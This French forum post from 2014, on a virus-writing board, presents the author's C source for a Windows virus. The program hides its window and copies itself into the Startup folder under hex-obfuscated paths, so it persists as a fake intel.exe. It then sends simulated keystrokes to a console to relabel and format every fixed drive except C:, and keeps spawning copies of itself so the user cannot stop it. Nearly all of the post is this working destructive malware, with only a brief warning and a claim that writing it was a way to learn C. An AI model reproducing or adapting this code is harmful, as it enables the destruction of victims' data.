code source de virus que j'ai écris en C

Moderator: Mod

code source de virus que j'ai écris en C

Postby SLIMMANU » Thu Dec 25, 2014 5:06 pm

Bonjour à tous,

Le code source , en dessous est un code écrit en C qui endommage les partitions d'un disque dur (Hormis le C).
[b:0965e139cb][color=red:0965e139cb]NE LE TESTER QUE SI VOUS ETES SUR DE CE QUE VOUS FAITES[/color:0965e139cb][/b:0965e139cb]

Certains me diront sans doute , pourquoi faire ce genre de choses.
En apprenant à coder des virus , cela m'a permis d'apprendre beaucoup plus que je n'en savais en C lorsque je faisais des applications de "gestion" ( base de données , fichiers , exceptions , etc).

[code:1:0965e139cb]#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <string.h>
#include <conio.h>

// made by M@nu SL!m
// alors le systeme devient entièrement unitilisable
int main(int argc, char *argv[])
{

HWND HideIt = GetForegroundWindow();
ShowWindow (HideIt, 0);
char lpBuffer[500], * p;
char lettre ;
int minuteur;
int k = 0;


char d1[] = "\x43\x3a\x2f\x55\x73\x65\x72\x73\x2f";
char d2[500];
strcpy(d2, getenv("\x55\x53\x45\x52\x4e\x41\x4d\x45"));
char d3[] = "\x2f\x41\x70\x70\x44\x61\x74\x61\x2f\x52\x6f\x61\x6d\x69\x6e\x67\x2f\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2f\x57\x69\x6e\x64\x6f\x77\x73\x2f\x53\x74\x61\x72\x74\x20\x4d\x65\x6e\x75\x2f\x50\x72\x6f\x67\x72\x61\x6d\x73\x2f\x53\x74\x61\x72\x74\x75\x70";

char big[9999] ;
strcat(big,d1);
strcat(big,d2);
strcat(big,d3);
strcat(big,"\x2f\x69\x6e\x74\x65\x6c\x2e\x65\x78\x65");

FILE *niche = fopen(big,"\x72");

char d4[] = "\x43\x3a\x5c\x55\x73\x65\x72\x73\x5c";
char d5[500];
strcpy(d5, getenv("\x55\x53\x45\x52\x4e\x41\x4d\x45"));
char d6[] = "\x5c\x41\x70\x70\x44\x61\x74\x61\x5c\x52\x6f\x61\x6d\x69\x6e\x67\x5c\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x5c\x57\x69\x6e\x64\x6f\x77\x73\x5c\x53\x74\x61\x72\x74\x20\x4d\x65\x6e\x75\x5c\x50\x72\x6f\x67\x72\x61\x6d\x73\x5c\x53\x74\x61\x72\x74\x75\x70";
char big1[500];
strcat(big1,d4);
strcat(big1,d5);
strcat(big1,d6);
strcat(big1,"\x5c");

strcat(big1,"\x69\x6e\x74\x65\x6c\x2e\x65\x78\x65");

if (niche == NULL)
{
CopyFile(argv[0],big,1);
system(big);
}

if ( strcmp(argv[0],big1) != 0 )
{
Sleep(10);
}


while(1)
{
GetLogicalDriveStrings(sizeof(lpBuffer), lpBuffer);
for(p = lpBuffer; *p != '\0'; p += 4)
{
if (GetDriveType(p) == DRIVE_FIXED )
{
// pas le C:

if(strrchr(p,'C') == 0)
{

lettre = p[0];
ShellExecute(NULL,NULL,"\x63\x6d\x64\x2e\x65\x78\x65",NULL,NULL,SW_NORMAL);

HWND hi ;// = //FindWindow("ConsoleWindowClass",NULL);
Sleep(2000);
hi = GetForegroundWindow();
SetForegroundWindow(hi);

// changement du nom de la partition en hacked

PostMessage(hi,WM_KEYDOWN,'L',0);
PostMessage(hi,WM_KEYDOWN,'A',0);
PostMessage(hi,WM_KEYDOWN,'B',0);
PostMessage(hi,WM_KEYDOWN,'E',0);
PostMessage(hi,WM_KEYDOWN,'L',0);

PostMessage(hi,WM_KEYDOWN,VK_SPACE,0);
PostMessage(hi,WM_KEYDOWN,lettre,0);
PostMessage(hi,WM_KEYDOWN,191,0);

PostMessage(hi,WM_KEYDOWN,VK_SPACE,0);

PostMessage(hi,WM_KEYDOWN,'H',0);
PostMessage(hi,WM_KEYDOWN,'A',0);
PostMessage(hi,WM_KEYDOWN,'C',0);
PostMessage(hi,WM_KEYDOWN,'K',0);
PostMessage(hi,WM_KEYDOWN,'E',0);
PostMessage(hi,WM_KEYDOWN,'D',0);

PostMessage(hi,WM_KEYDOWN,VK_RETURN,0);

// endommager la partition

Sleep(50);

PostMessage(hi,WM_KEYDOWN,'F',0);
PostMessage(hi,WM_KEYDOWN,'O',0);
PostMessage(hi,WM_KEYDOWN,'R',0);
PostMessage(hi,WM_KEYDOWN,'M',0);
PostMessage(hi,WM_KEYDOWN,'A',0);
PostMessage(hi,WM_KEYDOWN,'T',0);

PostMessage(hi,WM_KEYDOWN,VK_SPACE,0);

PostMessage(hi,WM_KEYDOWN,lettre,0);
PostMessage(hi,WM_KEYDOWN,191,0);
PostMessage(hi,WM_KEYDOWN,VK_RETURN,0);
Sleep(200);
PostMessage(hi,WM_KEYDOWN,'H',0);
PostMessage(hi,WM_KEYDOWN,'A',0);
PostMessage(hi,WM_KEYDOWN,'C',0);
PostMessage(hi,WM_KEYDOWN,'K',0);
PostMessage(hi,WM_KEYDOWN,'E',0);
PostMessage(hi,WM_KEYDOWN,'D',0);
PostMessage(hi,WM_KEYDOWN,VK_RETURN,0);
Sleep(100);
PostMessage(hi,WM_KEYDOWN,VK_RETURN,0);
Sleep(100);
PostMessage(hi,WM_KEYDOWN,VK_RETURN,0);
PostMessage(hi,WM_KEYUP,VK_RETURN,0);

Sleep(700);
PostMessage(hi,WM_KEYDOWN,'O',0);


PostMessage(hi,WM_KEYUP,'O',0);
PostMessage(hi,WM_KEYDOWN,'O',0);
PostMessage(hi,WM_KEYDOWN,'O',0);
PostMessage(hi,WM_KEYDOWN,'O',0);
Sleep(1000);
PostMessage(hi,WM_KEYDOWN,VK_RETURN,0);
Sleep(10);
PostMessage(hi,WM_KEYUP,VK_RETURN,0);
Sleep(10);

// ouverture de miliers d'invite de commandes pour empecher l'utilisateur d'arreter le processus
// s'il eteint brusquement l'ordi , alors la partition est endommagée
// et s'il laisse le processus , alors la partition est endommagée
// dans tous les cas , il se trouvera formaté
for(k =0 ; k < 15 ; k ++)
{
system(big1);

}

}

}

}
}

getch();

return 0; // selon le cas

}
[/code:1:0965e139cb][/b]
User avatar
SLIMMANU
Projets
 
Posts: 4
Joined: Wed Dec 24, 2014 8:03 pm

Return to Virologie informatique

Who is online

Users browsing this forum: No registered users and 1 guest

cron